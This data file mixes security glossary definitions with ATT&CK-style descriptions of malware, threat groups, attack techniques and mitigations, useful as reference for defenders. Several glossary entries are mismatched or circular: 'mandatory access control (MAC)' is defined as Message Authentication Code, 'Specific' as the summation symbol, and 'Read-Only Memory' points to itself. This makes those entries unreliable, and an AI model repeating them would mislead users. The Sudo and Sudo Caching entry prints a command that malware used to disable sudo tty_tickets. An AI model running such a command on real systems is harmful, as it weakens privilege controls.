Definition: A protocol defined in IETF RFCs 2440 and 3156 for encrypting messages and creating certificates using public key cryptography. Most mail clients do not support OpenPGP by default; instead, third-party plug-ins can be used in conjunction with the mail clients. OpenPGP uses a “web of trust” model for key management, which relies on users for management and control, making it unsuitable for medium to large implementations.

Term: malware
Definition: A computer program that is covertly placed onto a computer with the intent to compromise the privacy, accuracy, or reliability of the computer’s data, applications, or OS. Common types of malware threats include viruses, worms, malicious mobile code, Trojan horses, rootkits, and spyware.

Term: media
Definition: Physical devices or writing surfaces including, but not limited to, magnetic tapes, optical disks, magnetic disks, Large-Scale Integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within a system.

Term: commercial solutions for classified (CSfC)
Definition: A COTS end-to-end strategy and process in which two or more COTS products can be combined into a solution to protect classified information.

Term: SWAM
Definition: See Capability, Software Asset Management.

Term: <em>ss_K</em>
Definition: The security strength that can be supported by the key K

Name: FlawedGrace
Type: malware
Description: FlawedGrace is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.

Term: Capability, Manage and Assess Risk
Definition: The total process of identifying, controlling, and eliminating or minimizing uncertain events that may adversely affect system resources. It includes risk analysis, cost benefit analysis, selection, implementation and test, security evaluation of safeguards, and overall security review.

Term: Specific
Definition: The summation symbol.

Name: Social Media Accounts
Type: attack-pattern
Description: Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 

A variety of methods exist for compromising social media accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps). Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others. Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Term: decipher
Definition: Convert enciphered text to plain text by means of a cryptographic system.

Name: GOLD SOUTHFIELD
Type: intrusion-set
Description: GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.

Term: <em>q</em>
Definition: When used as an FFC domain parameter, <i>q</i> is the (odd) prime number equal to the order of the multiplicative subgroup of <i>GF</i>(<i>p</i>)* generated by <i>g</i>. Note that <i>q</i> is a divisor of <i>p</i> – 1.

Term: OS
Definition: A computer program, implemented in either software or firmware, which acts as an intermediary between users of a computer and the computer hardware. The purpose of an operating system is to provide an environment in which a user can execute applications.

Term: WS
Definition: A computer used for tasks such as programming, engineering, and design.

Term: card interface device
Definition: An electronic device that connects an integrated circuit card and the card applications therein to a client application.

Term: identity
Definition: Information that is unique within a security domain and which is recognized as denoting a particular entity within that domain.

Name: Cloud Service Discovery
Type: attack-pattern
Description: An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Log.

Term: asymmetric cryptography
Definition: Cryptography that uses two separate keys to exchange data, one to encrypt or digitally sign the data and one for decrypting the data or verifying the digital signature. Also known as public key cryptography.

Name: Code Signing
Type: attack-pattern
Description: Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature, this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. 

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

Term: system-specific control
Definition: A security or privacy control for an information system that is implemented at the system level and is not inherited by any other information system.

Name: Cleaver
Type: intrusion-set
Description: Cleaver is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889).

Term: subsystem
Definition: A major subdivision or component of an information system consisting of information, information technology, and personnel that performs one or more specific functions.

Term: Information System User
Definition: An individual (person). Also see Entity.

Term: World Geodetic System 1984
Definition: An Earth-centered, Earth-fixed terrestrial reference system and geodetic datum. WGS 84 is based on a consistent set of constants and model parameters that describe the Earth’s size, shape, gravity, and geomagnetic fields. WGS 84 is the standard U.S. Department of Defense definition of a global reference system for geospatial information and is the reference system for GPS. It is consistent with the International Terrestrial Reference System (ITRS).

Term: <em>nLen</em>
Definition: The bit length of the nonce.

Term: set theory relationship mapping
Definition: An OLIR that characterizes each relationship between pairs of elements by qualifying the rationale for indicating the connection between the elements and classifying the relationship based on set theory principles.

Term: critical program (or technology)
Definition: A program which significantly increases capability, mission effectiveness or extends the expected effective life of an essential system/capability.

Term: Agent
Definition: A program acting on behalf of a person or organization.

Term: common criteria
Definition: Governing document that provides a comprehensive, rigorous method for specifying security function and assurance requirements for products and systems.

Term: Guest operating system
Definition: A virtual machine that runs an instance of an OS and its applications.

Name: Systemctl
Type: attack-pattern
Description: Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications. 

Adversaries may use systemctl to execute commands or programs as Systemd Services. Common subcommands include: `systemctl start`, `systemctl stop`, `systemctl enable`, `systemctl disable`, and `systemctl status`.

Term: inadvertent disclosure
Definition: Type of incident involving accidental exposure of information to an individual not authorized access.

Name: REPTILE
Type: malware
Description: REPTILE is an open-source Linux rootkit with multiple components that provides backdoor access and functionality.

Term: malware
Definition: Software or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of a system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.

Name: AppDomainManager
Type: attack-pattern
Description: Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code. 

Known as "AppDomainManager injection," adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce, reverse or verify the operation, while an entity without knowledge of the key cannot. Examples include: 
1. The transformation of plaintext data into ciphertext data, 
2. The transformation of ciphertext data into plaintext data, 
3. The computation of a digital signature from data, 
4. The verification of a digital signature on data, 
5. The computation of an authentication code from data, 
6. The verification of an authentication code from data and a received authentication code, 
7. The computation of a shared secret that is used to derive keying material.

Term: Hardware Security Module (HSM)
Definition: A physical computing device that safeguards and manages cryptographic keys and provides cryptographic processing. An HSM is or contains a cryptographic module.

Term: Perfect Forward Secrecy (PFS)
Definition: An option that causes a new secret key to be created and shared through a new Diffie-Hellman key exchange for each IPsec SA. This provides protection against the use of compromised old keys that could be used to attack the newer derived keys still in use for integrity and confidentiality protection.

Term: <em>dQ</em>
Definition: RSA private exponent for the prime factor q in the CRT format, i.e., d mod (q-1); an integer.

Term: Trusted Third Party
Definition: An entity other than the owner and verifier that is trusted by the owner, the verifier or both to provide certain services.

Term: threat intelligence
Definition: Threat information that has been aggregated, transformed, analyzed, interpreted, or enriched to provide the necessary context for decision-making processes.

Term: Distribution
Definition: The transport of a key and other keying material from an entity that either owns or generates the key to another entity that is intended to use the key.

Term: Array
Definition: A fixed-size data structure that stores a collection of elements, where each element is identified by its integer index or indices.

Term: Key Management Service
Definition: The generation, establishment, distribution, destruction, revocation, and recovery of keys.

Name: ZeroT
Type: malware
Description: ZeroT is a Trojan used by TA459, often in conjunction with PlugX.

Term: bit string
Definition: An ordered sequence of 0’s and 1’s. Also known as a binary string.

Name: Compromise Host Software Binary
Type: attack-pattern
Description: Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.

Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., Modify Authentication Process).

An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.

After modifying a binary, an adversary may attempt to impair defenses by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).

Term: Operational phase
Definition: A phase in the lifecycle of a cryptographic key whereby the key is used for standard cryptographic purposes.

Term: Read-Only Memory
Definition: See Read-Only Memory.

Term: security control assessment
Definition: See control assessment or risk assessment.

Term: Qualitative Risk Analysis
Definition: A method for risk analysis that is based on the assignment of a descriptor such as low, medium, or high.

Term: volatility
Definition: The potential, tendency, or susceptibility of data, systems, system components, or entities to change over time, change in response to environmental input, or change without a known cause.

Term: records
Definition: The recordings (automated and/or manual) of evidence of activities performed or results achieved (e.g., forms, reports, test results), which serve as a basis for verifying that the organization and the system are performing as intended. Also used to refer to units of related data fields (i.e., groups of data fields that can be accessed by a program and that contain the complete set of information on particular items).

Term: Preimage
Definition: A message Ms that produces a given message digest when it is processed by a hash function.

Term: Key wrapping
Definition: A method of encrypting keys (along with associated integrity information) that provides both confidentiality and integrity protection using a symmetric key.

Term: risk framing
Definition: Establishing the context for risk-based decisions.

Term: eXtendable-Output Function (XOF)
Definition: <p>A function on bit strings in which the output can be extended to any desired length. Approved XOFs (e.g., those specified in FIPS 202) are designed to satisfy the following properties as long as the specified output length is sufficiently long to prevent trivial attacks:</p><p>1. (One-way) It is computationally infeasible to find any input that maps to any new pre-specified output.</p><p>2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.</p>

Term: disallowed
Definition: The algorithm or key length is no longer allowed for applying cryptographic protection.

Term: mandatory access control (MAC)
Definition: Message Authentication Code.

Term: Assurance of domain parameter validity
Definition: Confidence that the domain parameters are arithmetically correct.

Term: firewall
Definition: An inter-network gateway that restricts data communication traffic to and from one of the connected networks (the one said to be “inside” the firewall) and thus protects that network’s system resources against threats from the other network (the one that is said to be “outside” the firewall).

Term: Implementation Under Test
Definition: Implementation Under Test

Name: Wordlist Scanning
Type: attack-pattern
Description: Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to Brute Force, its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: Gather Victim Org Information, or Search Victim-Owned Websites).

For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories. This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: Exploit Public-Facing Application or Brute Force). 

As cloud storage solutions typically use globally unique names, adversaries may also use target-specific wordlists and tools such as s3recon and GCPBucketBrute to enumerate public and private buckets on cloud infrastructure. Once storage objects are discovered, adversaries may leverage Data from Cloud Storage to access valuable information that can be exfiltrated or used to escalate privileges and move laterally.

Name: Catchamas
Type: malware
Description: Catchamas is a Windows Trojan that steals information from compromised systems.

Name: AppleJeus
Type: intrusion-set
Description: AppleJeus is a North Korean state-sponsored threat group attributed to the Reconnaissance General Bureau. Associated with the broader Lazarus Group umbrella of actors, AppleJeus has been active since at least 2018 and is closely aligned in resources with TEMP.hermit, another DPRK-affiliated group under the same umbrella. The group’s primary mission is to generate and launder revenue to provide financial support to the government. AppleJeus primarily targets the cryptocurrency industry and is most notably responsible for the 3CX Supply Chain Attack. The group traditionally deploys malicious cryptocurrency software in combination with Phishing. From these compromised environments, it selectively deploys additional backdoors to enable extended operations against high-value financial targets.

Term: PACS
Definition: An automated system that manages the passage of people or assets through an opening(s) in a secure perimeter(s) based on a set of authorization rules.

Term: ISA
Definition: Individual who implements approved secure baseline configurations, incorporates secure configuration settings for IT products, and conducts/assists with configuration monitoring activities as needed.

Term: accountability
Definition: The property that ensures that the actions of an entity may be traced uniquely to the entity.

Name: Octopus
Type: malware
Description: Octopus is a Windows Trojan written in the Delphi programming language that has been used by Nomadic Octopus to target government organizations in Central Asia since at least 2014.

Term: cyber risk
Definition: The risk of depending on cyber resources (i.e., the risk of depending on a system or system elements that exist in or intermittently have a presence in cyberspace).

Term: Deactivated state
Definition: A key state in which keys are not used to apply cryptographic protection (e.g., encrypt) but, in some cases, are used to process cryptographically protected information (e.g., decrypt).

Term: transparency
Definition: A property of openness and accountability throughout the supply chain.

Term: network-layer onboarding
Definition: Consists of the actions required to provide an IoT device with the network credentials (and possibly other information) it needs to connect securely to a network.

Term: chain of trust
Definition: A certain level of trust in supply chain interactions such that each participant in the consumer-provider relationship provides adequate protection for its component products, systems, and services.

Term: Managed Devices
Definition: Personal computers, laptops, mobile devices, virtual machines, and infrastructure components require management agents, allowing information technology staff to discover, maintain, and control them. Those with broken or missing agents cannot be seen or managed by agent-based security products.

Term: Key derivation
Definition: The process by which one or more keys are derived from either a pre-shared key or a shared secret (from a key-agreement scheme), along with other information.

Term: information object
Definition: A well-defined piece of information, definition, or specification that requires a name to identify its use in an instance of communication.

Term: identify (CSF function)
Definition: Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

Term: Cryptographic key component
Definition: One of at least two parameters that have the same security properties (e.g., randomness) as a cryptographic key; parameters are combined using an approved cryptographic function to form a plaintext cryptographic key before use.

Name: RemoteUtilities
Type: tool
Description: RemoteUtilities is a legitimate remote administration tool that has been used by MuddyWater since at least 2021 for execution on target machines.

Term: zeroization
Definition: An action applied to a key or a piece of secret data. After a key or a piece of secret data is destroyed, no information about its value can be recovered.

Term: hand receipt holder
Definition: See hand receipt holder.

Term: risk analysis
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of a system. Part of risk management, incorporates threat and vulnerability analyses and analyses of privacy problems arising from information processing and considers mitigations provided by security and privacy controls planned or in place. Synonymous with risk analysis.

Term: Non-Volatile Data
Definition: Data that persists even after a computer is powered down.

Term: Fact Reference
Definition: An expression that refers to a bound CPE name.

Name: Data Loss Prevention
Type: course-of-action
Description: Data Loss Prevention (DLP) involves implementing strategies and technologies to identify, categorize, monitor, and control the movement of sensitive data within an organization. This includes protecting data formats indicative of Personally Identifiable Information (PII), intellectual property, or financial data from unauthorized access, transmission, or exfiltration. DLP solutions integrate with network, endpoint, and cloud platforms to enforce security policies and prevent accidental or malicious data leaks. This mitigation can be implemented through the following measures:

Sensitive Data Categorization:

- Use Case: Identify and classify data based on sensitivity (e.g., PII, financial data, trade secrets).
- Implementation: Use DLP solutions to scan and tag files containing sensitive information using predefined patterns, such as Social Security Numbers or credit card details.

Exfiltration Restrictions:

- Use Case: Prevent unauthorized transmission of sensitive data.
- Implementation: Enforce policies to block unapproved email attachments, unauthorized USB usage, or unencrypted data uploads to cloud storage.

Data-in-Transit Monitoring:

- Use Case: Detect and prevent the transmission of sensitive data over unapproved channels.
- Implementation: Deploy network-based DLP tools to inspect outbound traffic for sensitive content (e.g., financial records or PII) and block unapproved transmissions.

Endpoint Data Protection:

- Use Case: Monitor and control sensitive data usage on endpoints.
- Implementation: Use endpoint-based DLP agents to block copy-paste actions of sensitive data and unauthorized printing or file sharing.

Cloud Data Security:

- Use Case: Protect data stored in cloud platforms.
- Implementation: Integrate DLP with cloud storage platforms like Google Drive, OneDrive, or AWS to monitor and restrict sensitive data sharing or downloads.

Name: SynAck
Type: malware
Description: SynAck is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017.

Name: TinyTurla
Type: malware
Description: TinyTurla is a backdoor that has been used by Turla against targets in the US, Germany, and Afghanistan since at least 2020.

Name: Network Provider DLL
Type: attack-pattern
Description: Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions. During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening. 

Adversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`. Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.

Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.

Name: HIUPAN
Type: malware
Description: HIUPAN (aka U2DiskWatch) is a is a worm that propagates through removable drives known to be leveraged by Mustang Panda and was first observed utilized in 2024.

Name: Upload Malware
Type: attack-pattern
Description: Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.

Malware may be placed on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Malware can also be staged on web services, such as GitHub or Pastebin; hosted on the InterPlanetary File System (IPFS), where decentralized content storage makes the removal of malicious files difficult; or saved on the blockchain as smart contracts, which are resilient against takedowns that would affect traditional infrastructure.

Adversaries may upload backdoored files, such as software packages, application binaries, virtual machine images, or container images, to third-party software stores, package libraries, extension marketplaces, or repositories (ex: GitHub, CNET, AWS Community AMIs, Docker Hub, PyPi, NPM). By chance encounter, victims may directly download/install these backdoored files via User Execution. Masquerading, including typosquatting legitimate software, may increase the chance of users mistakenly executing these files.

Term: disinformation
Definition: The process of providing deliberately deceptive information to adversaries to mislead or confuse them regarding the security posture of the system or organization or the state of cyber preparedness.

Term: attribute-based access control (ABAC)
Definition: an access control paradigm whereby access rights are granted to users through the use of policies which combine attributes together. The policies can use any type of attributes (user attributes, resource attributes, environment attribute etc.

Term: packet sniffer
Definition: Software that monitors network traffic on wired or wireless networks and captures packets.

Term: <em>MacData</em>
Definition: A byte string input to the MacTag computation.

Term: accounting legend code
Definition: A numeric code used to indicate the minimum accounting controls required for items of accountable COMSEC material within the COMSEC material control system (CMCS).

Term: CPE Name Matching
Definition: A one-to-one source-to-target comparison of CPE names. CPE name matching has two phases

Term: Permission
Definition: Authorization to perform some action on a system.

Term: <em>0x</em>
Definition: The prefix to a bit string that is represented in hexadecimal characters.

Term: Media Access Control (MAC)
Definition: Message Authentication Code.

Term: Signature generation
Definition: The use of a digital signature algorithm and a private key to generate a digital signature on data.

Term: Signatory
Definition: The entity that generates a digital signature on data using a private key.

Term: Tag
Definition: See Tag

Term: Menezes-Qu-Vanstone
Definition: The Menezes-Qu-Vanstone key-agreement primitive.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented with a supporting infrastructure and policy, provides the services of: 1. Origin authentication, 2. Data integrity, and 3. Signer non-repudiation.

Name: Network Segmentation
Type: course-of-action
Description: Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between devices, systems, and applications. By segmenting networks, organizations can reduce the attack surface, restrict lateral movement by adversaries, and protect critical assets from compromise.

Effective network segmentation leverages a combination of physical boundaries, logical separation through VLANs, and access control policies enforced by network appliances like firewalls, routers, and cloud-based configurations. This mitigation can be implemented through the following measures:

Segment Critical Systems:

- Identify and group systems based on their function, sensitivity, and risk. Examples include payment systems, HR databases, production systems, and internet-facing servers.
- Use VLANs, firewalls, or routers to enforce logical separation.

Implement DMZ for Public-Facing Services:

- Host web servers, DNS servers, and email servers in a DMZ to limit their access to internal systems.
- Apply strict firewall rules to filter traffic between the DMZ and internal networks.

Use Cloud-Based Segmentation:

- In cloud environments, use VPCs, subnets, and security groups to isolate applications and enforce traffic rules.
- Apply AWS Transit Gateway or Azure VNet peering for controlled connectivity between cloud segments.

Apply Microsegmentation for Workloads:

- Use software-defined networking (SDN) tools to implement workload-level segmentation and prevent lateral movement.

Restrict Traffic with ACLs and Firewalls:

- Apply Access Control Lists (ACLs) to network devices to enforce "deny by default" policies.
- Use firewalls to restrict both north-south (external-internal) and east-west (internal-internal) traffic.

Monitor and Audit Segmented Networks:

- Regularly review firewall rules, ACLs, and segmentation policies.
- Monitor network flows for anomalies to ensure segmentation is effective.

Test Segmentation Effectiveness:

- Perform periodic penetration tests to verify that unauthorized access is blocked between network segments.

Term: cybersecurity framework profile
Definition: A representation of the outcomes that a particular system or organization has selected from the Framework Categories and Subcategories.

Term: TDES
Definition: Triple Data Encryption Standard specified in FIPS 46-3

Term: OT
Definition: A broad range of programmable systems and devices that interact with the physical environment or manage devices that interact with the physical environment. These systems and devices detect or cause a direct change through the monitoring and/or control of devices, processes, and events. Examples include industrial control systems, building automation systems, transportation systems, physical access control systems, physical environment monitoring systems, and physical environment measurement systems.

Term: specification
Definition: A document that specifies, in a complete, precise, verifiable manner, the requirements, design, behavior, or other characteristics of a system or component and often the procedures for determining whether these provisions have been satisfied. 
Refer to security specification.

Term: Confidential Computing
Definition: Hardware-enabled features that isolate and process encrypted data in memory so that the data is at less risk of exposure and compromise from concurrent workloads or the underlying system and platform.

Term: <strong>client</strong>
Definition: A machine or software application that accesses a cloud over a network connection, perhaps on behalf of a consumer.

Term: security requirement
Definition: A requirement levied on an information system or an organization that is derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, procedures, and/or mission/business needs to ensure the confidentiality, integrity, and availability of information that is being processed, stored, or transmitted. 
Note: Security requirements can be used in a variety of contexts from high-level policy-related activities to low-level implementation-related activities in system development and engineering disciplines.

Term: Cryptographic hash function
Definition: <p>A function on bit strings in which the length of the output is fixed. <strong>Approved</strong> hash functions (such as those specified in FIPS 180 and FIPS 202) are designed to satisfy the following properties:</p><p>1. (One-way) It is computationally infeasible to find any input that maps to any new pre-specified output</p><p>2. (Collision-resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.</p>

Name: Pass the Hash
Type: attack-pattern
Description: Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

When performing PtH, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform Pass the Ticket attacks.

Term: forensics
Definition: The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.

Term: Least common multiple
Definition: The smallest positive integer that is divisible by two positive integers without a remainder. For example, the least common multiple of 2 and 3 is 6.

Term: Proof of possession (POP)
Definition: A verification process whereby assurance is obtained that the owner of a key pair actually has the private key associated with the public key.

Term: security control assessment
Definition: The vehicle or template or worksheet that is used for each evaluation.

Term: portable storage device
Definition: Portable device that can be connected to an information system (IS), computer, or network to provide data storage. These devices interface with the IS through processing chips and may load driver software, presenting a greater security risk to the IS than non-device media, such as optical discs or flash memory cards. 
Note: Examples include, but are not limited to: USB flash drives, external hard drives, and external solid state disk (SSD) drives. Portable Storage Devices also include memory cards that have additional functions aside from standard data storage and encrypted data storage, such as built-in Wi-Fi connectivity and global positioning system (GPS) reception. 
See also removable media.

Term: resilient otherwise
Definition: Security considerations applied to enable system operation despite disruption while not maintaining a secure mode, state, or transition; or only being able to provide for partial security within a given system mode, state, or transition.

Term: control effectiveness
Definition: A measure of whether a security or privacy control contributes to the reduction of information security or privacy risk.

Term: KEK
Definition: A cryptographic key that is used for the encryption or decryption of other keys to provide confidentiality protection for those keys. Also known as a key-wrapping key.

Name: TA577
Type: intrusion-set
Description: TA577 is an initial access broker (IAB) that has distributed QakBot and Pikabot, and was among the first observed groups distributing Latrodectus in 2023.

Term: network onboarding component
Definition: A logical component that is authorized to act on behalf of the network to onboard devices that are authorized to connect to the network. The network onboarding component interacts with devices by using a network onboarding protocol.

Name: Ferocious
Type: malware
Description: Ferocious is a first stage implant composed of VBS and PowerShell scripts that has been used by WIRTE since at least 2021.

Term: event
Definition: Something that occurs within a system or network.

Name: Ixeshe
Type: malware
Description: Ixeshe is a malware family that has been used since at least 2009 against targets in East Asia.

Name: MESSAGETAP
Type: malware
Description: MESSAGETAP is a data mining malware family deployed by APT41 into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords.

Term: <em>h</em>
Definition: An integer whose value is the length of the output of the PRF in bits.

Term: Unified Extensible Firmware Interface (UEFI)
Definition: A possible replacement for the conventional BIOS that is becoming widely deployed in new x86-based computer systems. The UEFI specifications were preceded by the EFI specifications.

Name: Sudo and Sudo Caching
Type: attack-pattern
Description: Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.

Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>. Elevated privileges are required to edit this file though.

Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

In the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</code>. In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.

Term: cyber resiliency
Definition: The ability to anticipate, withstand, recover from, and adapt to adverse conditions, stresses, attacks, or compromises on systems that use or are enabled by cyber resources. Cyber resiliency is intended to enable mission or business objectives that depend on cyber resources to be achieved in a contested cyber environment.

Term: Item
Definition: A named constituent of a benchmark. The three types of items are groups, rules, and values.

Term: Manage Credentials and Authentication
Definition: An ISCM capability that ensures that people have the credentials and authentication methods necessary (and only those necessary) to perform their duties, while limiting access to that which is necessary.

Term: ML
Definition: The development and use of computer systems that adapt and learn from data with the goal of improving accuracy.

Term: COMSEC Incident Monitoring Activity
Definition: The office within a department or agency maintaining a record of COMSEC incidents caused by elements of that department or agency, and ensuring all actions required of those elements are completed.

Term: common vulnerability scoring system (CVSS)
Definition: A system for measuring the relative severity of software flaw vulnerabilities.

Term: CKMS hierarchy
Definition: A system of key processing facilities whereby a key center or certification authority may delegate the authority to issue keys or certificates to subordinate centers or authorities that can, in turn, delegate that authority to their subordinates.

Term: system of systems
Definition: System of interest whose system elements are themselves systems; typically, these entail large-scale interdisciplinary problems with multiple heterogeneous distributed systems.

Term: breach
Definition: The loss of control, compromise, unauthorized disclosure, unauthorized acquisition, unauthorized access, or any similar term referring to situations where persons other than authorized users, or where authorized users take actions for an other than authorized purposes, have access or potential access to sensitive information, whether physical or electronic.

Name: Windows Management Instrumentation
Type: attack-pattern
Description: Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems. WMI is an administration feature that provides a uniform environment to access Windows system components.

